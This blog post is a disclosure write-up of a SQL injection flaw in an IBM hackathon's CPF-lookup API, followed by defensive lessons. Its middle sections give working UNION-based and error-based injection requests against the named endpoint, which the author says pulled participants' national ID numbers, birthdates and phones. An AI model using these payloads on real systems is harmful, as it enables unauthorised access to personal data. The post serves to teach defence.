Before we start

As soon as I found out this security breach, I reported to the responsible. The breach is fixed already.
This article's objective is not to incentivize leak of data, just to show how to explore a simple system's vulnerability and point out how you can avoid that.
I don't have any data anymore, also I didn't give them away to anyone.
I hope you don't see such article like this in a bad way, the purpose is didactic and shows a very real case that allows us to learn more than regular examples and simulations.

About IBM's hackathon

IBM is holding a hackathon called Behind The Code in Brazil, that will be happening during July 2019 to incentivize people on learning their services around AI as Watson and IBM Cloud through challenging tasks.

Every week brings a new challenge that is available to participants to solve, and they have until the last day of the month to deliver them all.

The challenge is available at https://maratona.dev/ if you're interested.

A simple validation 🕵️‍♂️

After a couple of days, some of the hackathon's managers decided they should create a simple application to help devs making sure they have delivered their challenges successfully.

They ended up creating a site (available on https://desafios.mybluemix.net/) that will allow participants to type their CPF (analogous to SSN in Brazil) and verify whether their challenges have been successfully sent.

EDIT: After this article got published, for some reason, this site above have been removed regardless the breach was fixed.

So far everything looks simple, right? For a random curiosity that hit me, I decided to open my browser requests tab to see what kind of API was being used, I found out it was:

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=(CPF_HERE)

After breach got fixed, this endpoint has been changed along the HTTP method to be a POST over a GET.

I couldn't stop thinking how this query string was being consumed internally, so I started considering if it could be vulnerable to SQL Injection.

SQL Injection

SQL is a language used for databases, and how this name suggests, "injection" is a breach that allows you to execute database commands inside a third party application.

It's a big flaw that allows users to do things such as deleting data as reading that data.

I decided to test it by simply trying:

' or '1' = '1

That resulted in a request like:

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=' or '1' = '1

For my surprise, the page returned me an exception and a stack trace.

The first error 💣

I got so stunned that I forgot to print, sorry about that

This was the start. If I got something more generic like "not found" maybe I would just give up trying anything else here. So here's the first lesson:

Generate logs for internal developer consumption — Never expose exceptions and stack traces.

They're precious info for those who are looking for a security breach in your system.

Right now we can guess that the developer made something very similar to this (pseudo-code):

cpf = request.get.params.cpf;

db.query("SELECT * FROM desafios where cpf='" + cpf + "'");

desafios means challenges in portuguese.

Above example shows that cpf is a variable that contains my malicious code. Right now I can execute pretty much any database command without even caring about database's host, user or password.

Then here is the second lesson: ALWAYS filter any command sent by the user — Do not allow him to own what info is being sent to your database.

Recognizing the database 🔍

Before moving further to run more database queries, I need to find out which databases they use: Postgres, MySql, SQLServer, etc. This will help me when running more queries.

We can guess by querying specific tables used by some databases.

I started guessing it could be a MySQL, then I tried the following:

SELECT * FROM information_schema.tables --

I got an exception making it clear that the table doesn't exist. Fine, it's not MySQL, moving on...

My next bet is that it can be a Postgres, no special reason, just a guess.

SELECT * FROM pg_catalog.pg_tables; --

Guess what: We got it! Although we still had found an exception.

Sorry about the lack of prints this far, I couldn't believe the progress I had so fast. You can find images in the next steps for a better understanding of what did happen and how was the experience.

The exception was clear this time, the code has a clear rule, it should return a numeric result (like 1, 0, or similar) and the executed query for sure returns far more than a regular number.

Whatever, who cares? I already know which database I'm querying, that's huge!

Lets suppose… 🤔

Well, so far we already know:

My database commands are being run on their server and are bringing me valuable information (exceptions and stack traces);
They use Postgres;
If I want to query and read database's info, my query should return a single numeric column;

Good, what kind of info should I get first? Let's start with basic, every system has a user (usuario in Portuguese) table, probably this one is no exception.

Let's try:

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=' and '1' = '2' UNION SELECT cpf FROM usuario; --

In the above command, I nullify any condition from the targeted table that they would want to query when I create an impossible condition (1 = 2 would never be true), when I add UNION SELECT I can specify a secondary table that I want to "combine" in order to obtain results from.

JACKPOT!

The table does exist indeed, the column exists as well. But there's still an issue. Again, the stack trace will help me out to figure out what did happen!

In this example, it explains to me it couldn't convert a CPF as “000.000.000–00” to a number.

Don't worry, I know we're using Postgres, then I can use a function like regexp_replace to remove everything that's not a number!

Then, I can try the following request now:

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=' and '1' = '2' UNION SELECT regexp_replace(cpf, '\D','','g')::numeric FROM usuario; --

Note that I'm removing every dot and dash, keeping just numbers and converting the result explicitly to a number.

Our request response was excessively friendly. (Surely more than it should).

There we can see that it brought 25.475 CPFs from all participants.

I know you should be asking yourself about the "id_desafio" (id_challenge) there, but trust me: It's just being used for application consumption. The data in there is really the CPF from all participants in the following format: "00000000"

Now I wanted to be creative and try to guess what else I could find and what "numeric" columns I would be able to extract data from, then I decided to risk: "birthdate" and "telephone" ("datanascimento" and "telefone" in Portuguese).

It gets funny now. When I guessed “datanascimento” (birthdate), database correct my spelling with the proper column name: “data_nascimento” (birth_date).

I should repeat the first lesson again: Generate logs for internal developer consumption — Never expose exceptions and stack traces.

Anyway, thanks, Postgres! Now I can run my query succesfully:

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=' and '1' = '2' UNION SELECT to_char(data_nascimento,'DMMYYYY')::numeric FROM usuario--

also:

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=' and '1' = '2' UNION SELECT regexp_replace(telefone, '\D','','g')::numeric FROM usuario WHERE length(telefone) > 5--

I had to use a where clause here to filter some messy telephones.

Exploring — Where can we go? 🗺️

Cool, I already have participant's data, but I'm curious, what else can I extract from here?

This question can only be answered if I can find out which tables we got. We know that we're using a Postgres database, but how can I get strings if query only returns me valid numbers?

Well, this far I already consider exceptions and stack traces good friends. I'm gonna intentionally generate errors that will allow me to extract what I desire.

Postgres has a table that holds that information: pg_catalog.pg_tables.

What happens when I try to convert a string that is clearly a name/word to a number?

You guessed right if you thought it would tell me it can't convert "tableX" to a number.

May I repeat once again?

Generate logs for internal developer consumption — Never expose exceptions and stack traces.

Now it just took me patience. I had to create conditions in order to filter tables I have already queried before and read each error carefully.

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=' and '1' = '2' UNION SELECT tablename::numeric FROM pg_catalog.pg_tables where tablename not in ('desafio', 'usuario', 'promocodes') and tablename not like 'pg_%' and tablename not like 'sql_%'  --

After some queries, I found some interesting tables:

promocodes
progresso_desafio (progress_challenge from Portuguese)
pontos (score from Portuguese)

Each hackathon phase is composed of challenges, and if there's a draw, those who sent first wins. Fair enough, the only annoying detail is that this kind of information can't be shared to participants, so you can't know beforehand how many points you have scored.

Well, since I'm here why I can't find out how much I scored on the first phase? (SPOILER: Not that good haha)

I need to identify which columns each table has. It shouldn't be that different from what I tried for identifying the tables.

In the end (with the same patience), I got it through the request:

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=' and '1' = '2' UNION SELECT column_name::numeric FROM information_schema.columns where table_name='progresso_desafio' and column_name not in ('id_usuario', 'id_desafio', 'pontos', 'tempo_envio', 'status_envio', 'erro_actions', 'erro_counter') --

I found the following columns from table progresso_desafio:

pontos (score from Portuguese)
tempo_envio (time_sent from Portuguese)
status_envio (status_sent from Portuguese)
erro_actions (error_actions from Portuguese)
erro_counter (error_counter from Portuguese)

It's curious to see we have an error counter. I wonder how it's used internally.

Since I know the columns it's easy, I just had to execute this query to see my score:

GET https://8d829621.us-south.apiconnect.appdomain.cloud/users?cpf=' and '1' = '2' UNION SELECT pontos FROM progresso_desafio where id_usuario = 'MEUID'--

Lessons and learnings 📖

Table naming

I'm not against having tables with obvious names like: "user", "challenge", etc. It's part of developers environment and they're necessary to keep development agile, so I don't have any comments about it.

I'm in favor of creating all the blocks possible to prevent an invader from touching any part of your database, I don't care about any naming conventions you might follow.

Application user control

I could execute several commands. Very likely I'm able to run something more dangerous like an UPDATE on some participant's score or maybe a DELETE for some others participants. I didn't try any of these commands, because in case it works I don't how I would be able to rollback that. If this theory is correct (as my previous were) it would be a big mess.

Every time you have a small application with a single purpose (like a microservice) and this application has access to a database, create a user with a proper access policy and maximum restriction as possible.

Clearly, the only goal of this application is to inform users whether they have finished a challenge. Therefore, it should have a user in the database with really strict permissions to ONLY SELECT USER AND PROGRESS_CHALLENGE TABLES.

This way I would suffer trying to figure out which tables were available, (since tables information_schema.columns and pg_catalog.pg_tables would be blocked for the application), it wouldn't be possible to change nor delete any information (if possible) and the breach would be slightly smaller.

Exceptions should be alerts!

Exceptions aren't common anywhere. If a user tries to divide by 0 in a calculator, he expects a prompt explaining that's "impossible to divide by 0" instead of something like "Exception thrown at code line X can't divide by zero". You should handle all error possibilities! If an application triggers several exceptions (like I did intentionally previously) it should somehow alert developers to act faster (I suggest a tool like https://sentry.io).

Then they could verify an error rate increase and read the same exceptions that I have seen. As soon as any developer get notified with this weird "behavior" they would be able to interrupt me before I moved to new information that I got above.

Don't trust your users

No, they're not using it as you expect to.

If the field allows only numbers, THEY WILL TYPE LETTERS.

If the field allows only CPF, they will try a SQL command!

Be prepared, if it only allows a CPF. Validate that value does exist, make sure there's nothing different from digits, filter everything that's different from what you would like to see there.

ALWAYS filter any command sent by the user — Do not allow him to own what info is being sent to your database.

Let's finish with the golden rule, I'm gonna repeat it once again since it's the most precious (and costly) rule that made it all possible:

Generate logs for internal developer consumption — Never expose exceptions and stack traces.

It would be so unmotivating if as I tried my first SQL Injection attempt if I had received a boring 404 as it is now:

Conclusion

So far I have enough information to tell that his breach is really dangerous and exposes hackathon's participants way too much.

I thank the hackathon's managers for fixing it quickly (the issue was solved the next day).

And finally, 30 points wouldn't make me win the hackathon 😢 I might try again the next time.